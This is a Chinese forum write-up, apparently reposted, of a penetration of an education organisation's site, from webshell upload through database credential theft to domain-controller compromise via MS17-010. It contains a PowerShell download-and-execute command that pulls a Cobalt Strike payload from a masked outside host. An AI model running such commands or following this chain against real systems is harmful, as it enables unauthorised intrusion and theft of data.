找回密码
 立即注册
查看: 2936|回复: 0

渗透实战 | 从外网直接打到内网全过程

[复制链接]
发表于 2024-3-1 19:41:32 | 显示全部楼层 |阅读模式

2 U/ F1 `4 L, o& u 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路 , B& n8 s( ~6 r0 [3 Y" O- w

1 ~7 j) j* q7 W

' P: L( x4 p! y; W   / A$ |3 T/ [6 D. U- ~3 N; U

+ k S5 E$ p; U/ P. ~# c

8 P& Z- a1 S( t% L8 q+ y% I3 P5 | 正文 : C/ }& I. z: M& w

3 Y" I3 B( S7 x: `+ o

% _) d6 K. |. k }/ H  & J6 n+ K$ ^% l- I6 ]8 I3 |

( k2 @0 j/ X% S" H

5 g' ]: h X; q& w0 J7 O+ L 目标:www.xxxx.com(一家教育机构)
. [0 r& n' p, h8 s* M' R
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
& ]$ P8 @* j. {5 `8 {* G$ N

5 L- l5 w2 s c9 ~

2 z& E5 S8 b3 F+ `/ e vshapes=+ c/ o$ a( G4 B D' _& g% ?

" r! D# [0 o( {' m( f. S

( h8 l- C( ?8 f m% \! _# v 进行了简单的信息搜集
& A2 b- n; C/ V' p1 P+ m* J
8 \% l, Q; d& y& |$ Z5 O6 k
8 q/ h4 @5 B! F# x

- L1 J2 p' _- f! O

+ L! H3 Y+ u/ ?+ } 子域名搜集% A H: H: o6 r( ~5 T

6 F5 j5 b$ ]. a8 D

/ E$ A$ Z+ t3 z# F5 m4 C vshapes=# l5 O, r% k5 c* i+ g0 i

# |* t2 ]3 F% Q: ^1 i4 T$ p) p1 z* y1 X6 `

, V% a" P1 e& C3 v7 N. A fofa找资产
4 `2 D* K% Z: M2 ]* d! H
- [* a! b9 |& o* S, T) g
; n) s! |) V5 a1 Z: X

" S2 c: w8 ]0 ]# F

( y4 h: V/ E( Y9 Z4 F vshapes= 4 q1 e: }8 K# }7 m3 C; V4 @

. E! d( V# @' j" e9 x

- j- L. Z0 y+ z( l 一共七个资产。去重之后只有两个。
8 o3 z- n- t- ~* F- a9 V/ S! {
* T, _% x/ h# |; T7 R% B
& I2 Q3 b# T4 O/ U; J

2 g6 Q( c O. }2 |; i" i

- p) m' t- J. |6 Y4 h) n6 R 目录探测 - A) N1 @+ w; c6 y* C# E2 A* e

4 H: {/ T* i: r6 j; l! j

e1 i5 h- B5 R9 Y7 c; N vshapes=: f4 v+ y2 k+ L7 X+ u

3 X% ?# |( v7 n* h) p& W- C

" M B8 o( g# R+ w1 d7 K 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
4 o& d! w4 Q/ ~: ]2 Z
. V9 H& ?1 b T# ^5 v8 U, A) _5 Q
+ b( @1 U4 ?! i; R2 e `3 {" a

; ?, ?+ v% s4 r( p8 k$ X, ~

9 j+ L# S5 M) [9 V) j) ~* m 我又尝试了通过修改返回包来绕过登录界面 - z$ ~4 g' m+ ^6 J( O3 ?( v# |

6 Q5 [1 O% j+ e5 T# s" m

% }" q5 b+ P! m" H: M vshapes= ; \5 x% [0 }5 f& e Z- Q0 L

# O1 z" f/ S2 [" {* S" f& y

% J$ Z* p6 a9 c- i9 i 还是不行,尝试注入无果 4 x1 Y* J& y7 |

+ G: t( u. J$ Y& M1 P

1 z% Z. u. e* k2 D$ Q' P vshapes=5 Q' Z! a7 D- c$ I% H; Y

, v: o3 f6 q7 v, c

4 [3 n' G! L) l! w5 Q% v) M. G 不过我目录探测出了一处Spring信息泄露
$ _! N, d2 i/ }! ?
% o8 G1 E$ ^: Z/ K: t) _* w
# u2 H5 t' ^* y: f

6 Q7 Y+ o% L M* U/ k

6 {3 p; e. o2 \' |5 }! p vshapes=4 O8 }. ~5 Z l1 A

3 k& x2 s3 ]4 x( S; X0 M& I

) n9 y" Y6 n. Q- Z" M 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 # h: o8 r1 k$ u% e: B' |

9 N, p' m" s0 Z# K/ m8 d# D; z, o

' ?5 ~5 ^6 Q' k vshapes= : b2 r5 a5 W) m) p( J$ {

3 _) ?* {/ T( O3 X: _1 h

" ?8 z p: T: A9 r3 v 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。2 t3 t4 F, T- z5 L9 r7 _

9 k- }$ \7 t0 _7 _( }6 p# X8 v

1 \5 c5 m+ [2 u" ?: E7 a vshapes=! h- t3 P2 z. j% f! r

" @, C! w: X2 F, d2 D! K

8 ]$ h" x/ ] c' Y4 ^ 获取有些师傅到这一步就手机抓包电脑测了。 + E) r! g% S* ]

; w# p$ G7 _+ O/ c

: @6 Z& m) p( s' h Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。9 x' ~4 W% c L% Q

" g* \, i5 J, q2 Z+ Z9 s' x

, _! F* h! x" R4 r 其中在一个公众号发现了小程序,可以进行注册。+ |. k. |: W0 C4 g# }& G. y+ I

% P5 G: Z R; F

- v( ^/ F5 N- u P: N: C O 看到了头像上传,尝试上传获取WebShell# @* y9 d$ L5 m& p" A2 |! R7 o

! Z! B9 _& B6 O

; o3 S n& z( \ vshapes=* S/ a4 }7 S# F o& q4 M3 X! Y2 x

1 f" r. Y5 X) O9 X1 m' T

3 z. `$ \6 n$ i: s- ?0 q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问, o. d' j; y" K( |$ p( g

, `- J$ r5 y/ t1 G0 Q

3 u9 O" J2 U6 g9 ?4 o vshapes=# e' f p1 e& B* r0 H( R0 ^2 A) @5 B1 m

. P2 L9 T/ U& y; |* d$ W8 H* O7 Z

/ J5 n0 Y( U: b( v 然后上了大马 % D8 ~! b( B8 M! c

4 u( t8 H) t- A- S! M

# A! ?/ Y' T: z vshapes= / l- Y, q: Z) | U. I' I) {# _

- g+ Z# u9 j6 f, o5 ]

! L$ ~4 I9 v9 z vshapes= ( v& a4 d7 y a7 P; ?+ b9 H

5 v7 v7 a, G8 u3 u

( ?4 `/ ^4 L( L6 p& z- d1 Y 通过翻找文件发现数据库账号密码- b9 ]. z! Q0 L1 d4 P7 I$ u4 v8 O

& `% J/ O: t7 D M

8 M/ Q. a* w4 C vshapes= : X' [- T9 Y! }9 I8 h4 h

9 P' r; G' \5 I" o

0 m1 X+ ~3 m, o4 }/ Y --内网渗透$ I, n& p' x+ R4 H

' [ w% a# W- j/ W& Q

8 {( J! y9 Q7 I* j/ k6 x, R l 直接通过powershell执行 cs上线 & y. }' O* h: l9 G9 ]; S4 w

2 z' s( W7 t2 K$ z7 c8 D1 L

: ~) N' h8 L' m- } powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" - M" e5 G9 { P

4 L$ P" n# m) ]! v

0 c9 Z8 c7 U" v vshapes=' e/ k' Z4 n7 H3 X% e

# ^" O8 X) W/ u6 f# g( T* s' o* t

4 b+ s0 k* ^6 r# y1 I/ w& k/ I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ! G ^* z7 h# Y" N! L! d' y

H; b1 V" Z! g

4 @2 m! _9 ?# ] vshapes= 3 O1 D2 J2 W& n5 {& E

) X- j" `; @ p4 h' B, Z K

^. s* C/ H) Y# s( m 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
3 ^8 S5 U2 p& \) K0 l T; Y$ z
) A# S& o& J9 i9 W4 Y) f
6 a4 p6 f3 d! O+ s! r
' Q0 a1 f. H; E6 q. \- t. b

0 G4 x+ R, C% T- [% @, F5 g

7 ?/ k9 h- K# ?- _7 R vshapes= ) P! H* y' ~+ i; `9 {* E( m

( d2 \/ S) E7 v! b) H

$ L N D& u/ V/ W2 `% K& y 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
4 b! }" o# a1 N4 P8 E. K9 G' { {; C- M. D
9 ~& G5 p5 |: n ?6 Y7 ?
y/ d3 h/ }) I% v2 D+ y r+ g3 N' C

5 N+ `# p5 A, @5 f. r( G

# d$ {5 r5 K9 S# Z: W Q vshapes=" j1 T5 C7 Z6 z5 Z# z3 Y! P( s

g$ O. X) C" ~3 S* m

0 F' a3 H# W2 l4 U
6 c; ?8 t3 V+ e( G7 a/ ^6 |# t" c1 E
+ Z5 r$ o) D1 k% Q, w3 y
6 J2 @" I1 T( X# ?# ]( U

# Z# P h* m3 I/ A9 g {# u/ M5 Y1 P6 M

/ m) K; m7 ]0 S  3 v" L- ^0 ]7 l' k" j( S' T. X

3 k7 V; a+ d; j2 A

7 N; s& P, l+ v6 @8 n8 k$ i3 ? 小结: W, P9 c9 m( g" @ S |! ]

`% B8 t- l5 n/ O$ ?

/ |4 Z& p0 M7 B1 k& E0 Y6 p   / s$ N4 ]! g, @) Z1 f o

?7 N" G" n7 w1 v$ S6 b

* D& G5 c# u3 v8 E9 ` 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 9 u* u9 X# o( l% W

9 n" @8 k: S/ l$ O- s; M6 L

$ Q+ `2 r0 ~$ `7 B. r- p/ w  + {8 \6 a( N: C+ \& f: e, P8 I

. C8 H# Z" z+ M$ m
    , l6 U4 b, G+ k& u% }+ }% \0 o9 Y
  • 6 P- |2 B, }- b8 y  ; Q; k F4 |& J+ D; B
  • ; _/ C5 l) V& L) m j9 e
  • 7 X8 x$ P6 x+ y" [   % ^, b4 B) [7 _
  • : j4 ^( P6 ^- k+ j' r: u- A2 U% ~
3 X5 f Q$ k2 m/ p0 X$ n4 `

5 D. p3 e) x; f: O 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html8 X& p# y) B. A" i

- q/ j5 }! T' P$ A- B0 W! c) _

8 ^2 ]. ]% t+ s3 H1 l- [) ^( Z1 L   / T: ?$ N; l! i' J3 M* @

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表